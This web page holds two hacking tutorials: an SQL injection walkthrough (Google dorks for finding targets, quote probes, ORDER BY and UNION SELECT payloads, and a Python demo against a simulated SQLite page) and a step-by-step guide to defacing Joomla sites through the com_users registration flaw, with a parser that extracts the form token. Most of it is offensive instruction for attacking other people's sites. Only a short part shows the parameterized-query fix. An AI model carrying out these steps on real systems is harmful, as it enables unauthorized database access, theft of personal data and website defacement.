SQL Injection Tutorial for Beginners

Although there are thousands of exploits designed to take advantage of badly built websites, SQL injection remains one of the most effective, easiest, and most far-reaching attacks. SQL injection attacks are reported daily as more and more websites rely on data-driven designs to generate dynamic content for readers. These designs typically sit on MySQL or another SQL database; when the site builds its queries by pasting user input into SQL strings, it is open to attack.
Because a SQL injection attack works directly against the database, you should have a basic understanding of SQL before getting started. SQL Database for Beginners is an excellent resource for those unfamiliar with Structured Query Language.
In this article, you will learn how a SQL injection attack against a website is carried out. Please note that this article is for instructional purposes only. If you break into a website that does not belong to you, you are committing a crime (in the United States, a federal one) and could face incarceration and hefty fines. That said, understanding how SQL injection works is exactly what you need in order to prevent it on your own website.

What is a SQL Injection?

SQL injection is a code injection technique that exploits a flaw in the way an application talks to its database. The flaw arises when user input is inserted into a SQL statement without being properly escaped or, better, bound as a parameter: characters such as the single quote that terminate a string literal let the attacker's input be parsed as part of the query rather than treated as data.
Although SQL injection is most commonly used against websites, it works against any application that builds SQL from untrusted input, whatever the front end. Last year, a security company reported that the average web application is attacked at least four times per month with SQL injection techniques, and that online retailers receive more such attacks than any other industry with an online presence.

Picking a Target

The first step in a SQL injection attack is finding a vulnerable website, and this will probably be the most time-consuming part of the entire process. More and more websites protect themselves against SQL injection, so finding a vulnerable target can take quite some time.
One of the easiest ways to find candidate sites is known as Google Dorking. In this context, a dork is an advanced search query that returns websites matching a specific pattern, typically a PHP script name with a parameter in the URL. Some dorks used to find sites that may be vulnerable to SQL injection:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
Of course, there are many others. What these queries have in common is that they target PHP scripts that take a parameter through the URL and use it to generate dynamic content from a SQL database on the backend. You can learn more about advanced Google search techniques in Unleash Google Search.
Remember that a SQL injection attack can work against any SQL database, but PHP-based websites are the usual targets because they can be set up by just about anyone (e.g. a WordPress install) and their databases often hold a lot of valuable customer information.
However, a site showing up for one of these dorks does not mean it is vulnerable. The next step is to test each site until you find one that is.
Navigate to one of the websites you found. For this example, assume one of the search results is http://www.udemy.com/index.php?catid=1. To check whether the parameter is injectable, add a single quote (apostrophe) to the end of the URL like this (the browser will send it as %27):
http://www.udemy.com/index.php?catid=1'
Press Enter and see what the website does. If the page returns a database error (for example a MySQL syntax error mentioning the quote), the parameter is almost certainly injectable: the quote closed the string or broke the expression in the application's SQL. If the page loads normally, the parameter is not an obvious candidate and you can move on to the next URL in your list. Keep in mind, though, that a site with error display turned off can still be injectable (so-called blind injection, detected through differences in page content or response time rather than an error message); this tutorial only covers the case where errors are shown.
The exact wording of the error is useful for recognizing which database engine is behind the site, but as a general rule, if the website returns any SQL error it is worth pursuing with SQL injection techniques.
At this point, understanding SQL is even more important as you will begin manipulating the database directly from the vulnerable page. Practical SQL Skills is a solid resource for beginner and intermediate users.

Starting the Attack

After locating a vulnerable site, you need to find out how many columns the vulnerable query selects and which of those columns are rendered on the page, so that data you inject into them becomes visible. Append an "order by" clause to the URL like this:
http://www.udemy.com/index.php?catid=1 order by 1
Keep increasing the number after "order by" until you get an error. ORDER BY n sorts by the n-th column of the result set, so the highest number that does not produce an error is the number of columns in the vulnerable SELECT statement (not the number of columns in the database). Next you need to find out which of those columns are displayed.
You do this by appending a "union select" statement to the URL. For a six-column query the URL looks like this:
http://www.udemy.com/index.php?catid=-1 union select 1,2,3,4,5,6
There are a couple of things to note in this example. The original value is changed to -1 (a category id that does not exist) so that the first part of the query returns nothing and only the row contributed by your union select is rendered. The number of values after "union select" must equal the column count found in the previous step, otherwise the database rejects the UNION. For instance, if you discovered that the query has 12 columns, you would append:
catid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12
The page now shows some of the numbers 1 to 12 in place of its normal content. Each number that appears identifies a column that is rendered on the page; those are the positions where you place the SQL expressions whose results you want to read.

Exploiting the Database

At this point, you know which columns to direct your queries at and you can begin exploiting the database. You will rely on union select statements for most of the work from here on.
The only thing left to do is replace one of the displayed numbers with a SQL expression. Common steps from here are listing the available databases, retrieving the current user (in MySQL, the database() and user() functions), listing the tables, and ultimately the columns within those tables (in MySQL, from the information_schema tables). The columns are where the personal information is stored. The tutorial ends here: you have learned how to select a vulnerable website and determine which columns are reflected on the page.
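The whole procedure, from the apostrophe probe through column counting, union select marker discovery and a first data pull, as an added example that is not part of the original article. It runs against a simulated page backed by an in-memory SQLite database; the tables, rows and HTML template are constructed for the demo, and since the article's targets are MySQL the error text and the metadata table differ (noted in the comments). The vulnerable page concatenates the catid parameter into its SQL exactly as the tutorial assumes; a parameterized version of the same page is included so you can watch the same probes fail against it.

```python
"""Added example: the tutorial's probes run against a simulated vulnerable page.
Everything here is constructed for the demo (in-memory SQLite, made-up rows)."""
import re
import sqlite3

# Constructed schema: the page queries `categories`; `users` is the prize.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE categories(id INTEGER, name TEXT, slug TEXT);
    INSERT INTO categories VALUES (1, 'Books', 'books'), (2, 'Games', 'games');
    CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 'hunter2');
""")


def render(rows):
    """The 'template': shows name and slug only; id is fetched but never printed."""
    return "\n".join(f"<h1>{name}</h1><a href='/{slug}'>" for _id, name, slug in rows)


def vulnerable_page(catid: str) -> str:
    """index.php?catid=... done wrong: the raw parameter is glued into the SQL,
    so it is parsed as SQL. Raises sqlite3.OperationalError where the real page
    would print a MySQL error."""
    sql = "SELECT id, name, slug FROM categories WHERE id = " + catid
    return render(db.execute(sql).fetchall())


def safe_page(catid: str) -> str:
    """Same query with a bound parameter: the value is data, never SQL."""
    sql = "SELECT id, name, slug FROM categories WHERE id = ?"
    return render(db.execute(sql, (catid,)).fetchall())


def probe_with_quote(page, catid="1") -> bool:
    """Detection step: append an apostrophe; True if the backend threw a SQL error."""
    try:
        page(catid + "'")
        return False
    except sqlite3.OperationalError:
        return True


def count_columns(page, catid="1", limit=50) -> int:
    """ORDER BY n for n = 1, 2, ... until the database rejects it. The last n
    accepted is the column count of the vulnerable SELECT, not of the database."""
    accepted = 0
    for n in range(1, limit + 1):
        try:
            page(f"{catid} ORDER BY {n}")
            accepted = n
        except sqlite3.OperationalError:
            break
    return accepted


def find_reflected_columns(page, ncols) -> list:
    """UNION SELECT one distinct marker per column (the tutorial uses 1,2,3...;
    strings are harder to confuse with normal page content). catid=-1 matches
    no real row, so anything rendered came from the UNION row."""
    markers = ",".join(f"'mark{n}'" for n in range(1, ncols + 1))
    html = page(f"-1 UNION SELECT {markers}")
    return [n for n in range(1, ncols + 1) if f"mark{n}" in html]


def dump_table_names(page, ncols, col) -> list:
    """Replace one reflected marker with an expression. sqlite_master is SQLite's
    counterpart of MySQL's information_schema.tables."""
    cells = ["NULL"] * ncols
    cells[col - 1] = "name"
    payload = f"-1 UNION SELECT {','.join(cells)} FROM sqlite_master WHERE type='table'"
    return sorted(re.findall(r"<h1>(.*?)</h1>", page(payload)))


if __name__ == "__main__":
    for label, page in (("vulnerable", vulnerable_page), ("parameterized", safe_page)):
        print(f"{label}: quote probe errored = {probe_with_quote(page)}")
    ncols = count_columns(vulnerable_page)
    shown = find_reflected_columns(vulnerable_page, ncols)
    print(f"columns in SELECT: {ncols}; rendered on page: {shown}")
    print("tables:", dump_table_names(vulnerable_page, ncols, shown[0]))
    print("same UNION against the parameterized page:", repr(safe_page("-1 UNION SELECT 1,2,3")))
```

Against the vulnerable page the run reports three columns with columns 2 and 3 rendered, then leaks both table names through column 2. Against the parameterized page the quote produces no error and the UNION payload produces an empty page, because the whole string is compared against the id column as a value. That is the fix for your own site: bind values, never concatenate them into SQL. Note that against a parameterized page the ORDER BY loop never errors and simply runs to its limit, which is why the count is only meaningful once the quote probe has confirmed injection.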

Using this information, you can search for vulnerabilities within your own websites and perform penetration testing for others. Remember that what you do with this information is solely your responsibility. Hacking is a lot of fun, but that doesn't mean you have to break the law to have a good time.

How to deface a website with the Com_User method


Com_User is one of the Joomla exploit techniques most popular with defacers in Indonesia and indeed around the world. The Com_User Joomla! exploit technique can be used against sites running Joomla! CMS versions 1.6.x, 1.7.x and 2.5.x.

What is the Joomla CMS?
Joomla! is a free and open-source content management system (CMS) written in PHP with a MySQL database, for use on the internet or an intranet. Joomla was first released as version 1.0.0. Joomla!'s features include a caching system for better performance, RSS, blogs, polls, and so on. Joomla! is released under the GPL.
The name Joomla comes from the Swahili word jumla, which means "all together".
(quoted from wikipedia.org)

What you need:
1. The Joomla exploit (download here)

Steps:

1. Find a target site using a search engine with the "dork" below.
Click to open: Google Dork Com_User

2. Once you have found a site running the Joomla! CMS, try opening its administrator page to check whether the site is "vuln" or not.

3. Find a vuln site.
*Explanation: Vuln = Vulnerability = has a weakness. A site that is called vuln is therefore one we can deface.


The image above shows a "vuln" site, i.e. one running Joomla CMS version 1.7.x.


The image above shows a "Joomla version 1.6.x / 2.5.x" site.

Note: "The difference between a vuln site and the others can be seen at the bottom, in the footer of the Joomla Administration Login page."

*A site running "version 1.6.x or 2.5.x" is not necessarily undefaceable/not vuln; it is just that only about 25% of Joomla sites that look like the image above can be defaced this way. Once you have defaced sites this way for a while, you will recognize the traits of a defaceable Joomla site without having to look at its administrator page.

4. After finding a "vuln" site, append the following to the end of the site's address/domain/URL.

index.php?option=com_users&view=registration

*For example, if the site I want to deface is http://targetmu.com/joomla/ then I add the exploit path to the end of that address, giving http://targetmu.com/joomla/index.php?option=com_users&view=registration

5. After following the step above, you will land on the registration page.
*If, when you go to the registration page, the site redirects you to the login page, look for another target: that site's admin has removed the registration page.


6. Once you are on the registration page shown in the image above, the next step is to press Ctrl+U / right-click -> View page source, and you will see something like the image below.


7. Search for the hidden field (with the help of Ctrl+F); look for a hidden input like the one in the image below.


8. Copy the code marked with the red box into the Joomla exploit you downloaded earlier.

9. Open the Joomla exploit you downloaded with Notepad. Paste the code you copied into the second red box (the one at the very bottom). Then enter the address of the site being exploited,

for example http://targetmu.com/joomla/index.php?option=com_users&view=registration, into the first red box at the very top.

*Don't forget to change the email address and username (your choice)
*Leave the two passwords different


10. Save the file.

11. Then open that Joomla exploit file in a web browser (Google Chrome/Mozilla Firefox).

12. Once it is open, you will see something like the image below.


13. With the file open in the browser and the form from the image showing, the next step is to click the Register button at the bottom.

14. You will then get a message saying that the passwords you entered do not match (that is the wording when translated into Indonesian).

15. Change the password (to whatever you like) and click Register again.

16. Once that succeeds, open the activation link sent to your email.
*If the activation link does not arrive in the INBOX of your webmail, check the SPAM folder. If it is in neither, try reloading/refreshing your mailbox.

17. After clicking the activation link in the email, registration is complete and you can log in to the administrator page (add /administrator to the end of the site's address).

*For example, if the site's address is http://targetmu.com/joomla/ then add /administrator to the end, like http://targetmu.com/joomla/administrator

18. Then enter your username and password and log in.

19. Tadaa, you are now in the admin page and all that is left is to cut down its index (replace the front page).
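Steps 6 to 9 above are a manual hunt through the page source for the hidden inputs of the registration form. As an added example (not the tutorial's exploit file, which is not reproduced on this page), here is a Python parser that does the same job: it pulls every form out of the HTML with its action URL and its hidden fields, and picks out Joomla's form token, a hidden input whose name is a 32-character hex string and whose value is 1. The HTML below is a constructed sample shaped like a Joomla 2.5 com_users registration form; that shape, the field names and the token value are assumptions made for the demo. Fetching the live page (for example with urllib) is left to the reader.

```python
"""Added example: find the hidden inputs (and the form token) in a Joomla
registration page, the step the tutorial does by hand with Ctrl+U and Ctrl+F."""
import string
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample, shaped like a Joomla 2.5 com_users registration form.
# The field names and the 32-hex token name are assumptions made for the demo.
SAMPLE_HTML = """<html><body>
<form id="member-registration" action="/joomla/index.php?option=com_users&amp;task=registration.register" method="post">
  <input type="text" name="jform[name]" />
  <input type="text" name="jform[username]" />
  <input type="password" name="jform[password1]" />
  <input type="password" name="jform[password2]" />
  <input type="email" name="jform[email1]" />
  <input type="email" name="jform[email2]" />
  <button type="submit">Register</button>
  <input type="hidden" name="option" value="com_users" />
  <input type="hidden" name="task" value="registration.register" />
  <input type="hidden" name="3f8a2c1d9e4b7a6f5c0d1e2f3a4b5c6d" value="1" />
</form>
</body></html>"""


class FormParser(HTMLParser):
    """Collects each <form> with its action and its hidden/visible inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"id": a.get("id"), "action": a.get("action") or "",
                          "hidden": {}, "visible": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "text").lower() == "hidden":
                self._form["hidden"][a.get("name")] = a.get("value") or ""
            else:
                self._form["visible"].append(a.get("name"))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def extract_forms(html: str, page_url: str) -> list:
    """Parse html fetched from page_url; resolves each form's action to an absolute URL."""
    parser = FormParser()
    parser.feed(html)
    for form in parser.forms:
        form["action"] = urljoin(page_url, form["action"])
    return parser.forms


def joomla_token_field(hidden: dict):
    """Joomla's form token is a hidden input named with a 32-char hex string and
    valued "1"; return that name, or None if the form carries no such field."""
    for name, value in hidden.items():
        if (name and len(name) == 32 and value == "1"
                and all(c in string.hexdigits for c in name)):
            return name
    return None


if __name__ == "__main__":
    url = "http://targetmu.com/joomla/index.php?option=com_users&view=registration"
    for form in extract_forms(SAMPLE_HTML, url):
        print("form", form["id"], "posts to", form["action"])
        for name, value in form["hidden"].items():
            print("  hidden:", name, "=", value)
        print("  token field:", joomla_token_field(form["hidden"]))
```

Joomla checks this token against the visitor's session, so it is only accepted together with the session cookie it was issued for; that is why the form has to be submitted from the same browser session that loaded the registration page. The same parser, pointed at your own site, is a quick way to confirm whether public registration is still exposed at all.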


*There are 4 ways this can FAIL on a site using the Joomla CMS:
1. The site has removed the Registration Form page.
2. The Activation Link never arrives in the email.
3. The user is activated but we cannot get into the administrator panel.
4. The template cannot be changed.
Failure number 3 is the most common.